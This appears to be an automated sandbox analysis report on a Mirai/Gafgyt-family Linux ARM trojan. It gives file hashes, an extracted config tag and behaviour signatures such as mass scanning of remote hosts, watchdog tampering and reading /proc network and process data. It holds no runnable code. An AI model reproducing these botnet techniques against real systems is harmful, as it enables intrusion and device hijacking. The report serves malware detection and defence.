Analysis
-
max time kernel
152s -
max time network
154s -
platform
linux_armhf -
resource
debian9-armhf-en-20211208 -
resource tags
arch:armhfimage:debian9-armhf-en-20211208kernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
30-04-2023 03:27
General
-
Target
SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elf
-
Size
51KB
-
MD5
b03e2150d6fc9c256b4fad1f644ba3fb
-
SHA1
65466e5cd9cc1f3dbb0f47354258d6bea8f907de
-
SHA256
da56797ce94edb327d27a38350f1ac81edc00e755c423064464c07d1c58f564c
-
SHA512
f34ed32cf261e800e61388eea43d8721139356b47763defb06b6f2956650af0553d0e4e467610d615772432789c3a827f077e36305374795dd8aef2817251a21
-
SSDEEP
768:Jc5/VxsZBk6vdoxs3cEWkui8FTAI27PvbhTsr9iOFfyPGKX9q3UELah/dKZ5JF6e:u/VxOBRB3c5kumDza5iOp1LoKWl/giED
Malware Config
Extracted
mirai
UNST
Signatures
-
Contacts a large (57733) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.
-
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
Processes:
SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elfdescription ioc process File opened for reading /proc/net/tcp SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elf File opened for reading /proc/net/tcp -
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elfdescription ioc process File opened for reading /proc/net/tcp SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elf File opened for reading /proc/net/tcp -
Reads runtime system information 22 IoCs
Reads data from /proc virtual filesystem.
Processes:
SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elfdescription ioc File opened for reading /proc/228/fd File opened for reading /proc/306/fd File opened for reading /proc/301/fd File opened for reading /proc/344/fd File opened for reading /proc/350/fd File opened for reading /proc/364/exe File opened for reading /proc/1/fd File opened for reading /proc/225/fd File opened for reading /proc/233/fd File opened for reading /proc/275/fd File opened for reading /proc/356/fd File opened for reading /proc/207/fd File opened for reading /proc/230/fd File opened for reading /proc/271/fd File opened for reading /proc/285/fd File opened for reading /proc/304/fd File opened for reading /proc/307/fd File opened for reading /proc/352/fd File opened for reading /proc/self/exe SecuriteInfo.com.Gen.Variant.Trojan.Linux.Gafgyt.8.30058.6070.elf File opened for reading /proc/131/fd File opened for reading /proc/164/fd File opened for reading /proc/276/fd
Processes
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/351-1-0x00008000-0x0002ad10-memory.dmp